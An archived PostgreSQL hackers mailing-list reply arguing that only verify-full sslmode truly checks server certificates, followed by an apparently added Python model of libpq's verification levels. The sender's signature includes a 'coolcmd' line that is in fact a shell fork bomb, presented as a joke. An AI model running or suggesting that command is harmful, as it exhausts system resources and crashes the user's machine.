Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert

From: Thomas Habets <thomas(at)habets(dot)se>
To: Cameron Murdoch <cam(at)macaroon(dot)net>
Cc: Greg Stark <stark(at)mit(dot)edu>, Andrew Dunstan <andrew(at)dunslane(dot)net>, PostgreSQL-development <pgsql-hackers(at)postgresql(dot)org>, Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us>
Subject: Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert
Date: 2021-09-18 10:57:05
Message-ID: CA+kHd+dPstpDs7j5jhgHkiY_cd0iqMUigGwybDgru=2AQSwXOg@mail.gmail.com
Lists: pgsql-hackers

On Sat, 18 Sept 2021 at 00:10, Cameron Murdoch <cam(at)macaroon(dot)net> wrote:

> I also agree that the proposed patch is not the right way to go as it is
> essentially the same as verify-full, and I think that the correct fix would
> be to change the default.
>

But these are two changes:
1. Actually verify against a CA
2. Actually check the CN/altnames

Anything short of "verify-full" is in my view "not checking". Even with a
private CA this allows for a lot of lateral movement in an org, as if you
have one cert you have them all, for impersonation purposes.

Changing such a default is a big change. Maybe long term it's worth the
short term pain, though. Long term it'd be the config of least surprise, in
my opinion.
But note that one has to think about all the settings, such that the
default is not more checking than "require", which might also be surprising.

A magic setting of the file to be "system" sounds good for my use cases, at
least.

--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas(at)habets(dot)se <thomas(at)habets(dot)pp(dot)se>" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
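To make concrete the two separate checks the message above distinguishes (chain verification against a CA, and matching the server name against the certificate's CN/altnames), here is an added illustration in Python. It is not code from this thread or from libpq; it is a toy model of the three sslmode levels with constructed certificates (a private org CA, two servers it issued certs for, and one untrusted cert), and the trusted-CA names, hostnames and SAN lists are all assumptions invented for the example. The name-matching helper follows the documented libpq behaviour (dNSName SANs are checked when present, otherwise the CN is used) in simplified RFC 6125 form.

```python
"""Toy model of libpq sslmode verification levels (added example, not libpq code).

Constructed scenario: an org runs a private CA and issues a certificate to each
database host. The question the thread raises is what a client actually
checks under each sslmode when the certificate it receives belongs to a
different host than the one it intended to reach.
"""

# Constructed: the org's private CA is the only trusted issuer.
TRUSTED_CAS = {"Example Org Internal CA"}

# Constructed certificates: issuer, subject CN and dNSName SAN entries.
CERTS = {
    "db1": {"issuer": "Example Org Internal CA", "cn": "db1.internal.example",
            "sans": ["db1.internal.example", "*.db.internal.example"]},
    "db2": {"issuer": "Example Org Internal CA", "cn": "db2.internal.example",
            "sans": ["db2.internal.example"]},
    "untrusted": {"issuer": "Self-Signed", "cn": "db1.internal.example",
                  "sans": ["db1.internal.example"]},
}


def name_matches(pattern, hostname):
    """Simplified RFC 6125 dNSName match: case-insensitive; a wildcard is only
    accepted as the entire leftmost label and matches exactly one label."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    plabels = pattern.split(".")
    hlabels = hostname.split(".")
    # Reject "a*.example", "*", "*.com"-style patterns and embedded wildcards.
    if plabels[0] != "*" or len(plabels) < 3 or "*" in pattern[1:]:
        return False
    if len(plabels) != len(hlabels):
        return False  # wildcard must not span multiple labels
    return plabels[1:] == hlabels[1:]


def verify_peer_name(cert, hostname):
    """The extra step verify-full performs: check dNSName SANs; fall back to
    the CN only when the certificate carries no dNSName SAN at all."""
    names = cert["sans"] or [cert["cn"]]
    return any(name_matches(n, hostname) for n in names)


def verify(cert, hostname, sslmode):
    """Return (accepted, reason) for the given sslmode.

    Only the three modes discussed in the thread are modelled here.
    """
    if sslmode == "require":
        return True, "encrypted only; chain and peer name not checked"
    if cert["issuer"] not in TRUSTED_CAS:
        return False, "issuer not in trusted CA pool"
    if sslmode == "verify-ca":
        return True, "chain verified; peer name NOT checked"
    if sslmode == "verify-full":
        if verify_peer_name(cert, hostname):
            return True, "chain verified and peer name matches"
        return False, "chain verified but peer name does not match"
    raise ValueError(f"unmodelled sslmode: {sslmode}")


def lateral_movement_cases():
    """The client intends to reach db1 but is presented with db2's perfectly
    valid org-issued certificate. Shows which modes notice the mismatch."""
    return {mode: verify(CERTS["db2"], "db1.internal.example", mode)[0]
            for mode in ("require", "verify-ca", "verify-full")}


if __name__ == "__main__":
    for mode, accepted in lateral_movement_cases().items():
        print(f"{mode:12s} accepts db2's cert for db1: {accepted}")
    print("untrusted issuer under verify-ca:",
          verify(CERTS["untrusted"], "db1.internal.example", "verify-ca"))
```

Running it shows the point of the message in one table: `require` and `verify-ca` both accept a valid cert issued to a different host in the same org, so any one org-issued certificate can stand in for any other; only `verify-full` rejects it, because only that mode performs the second check.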
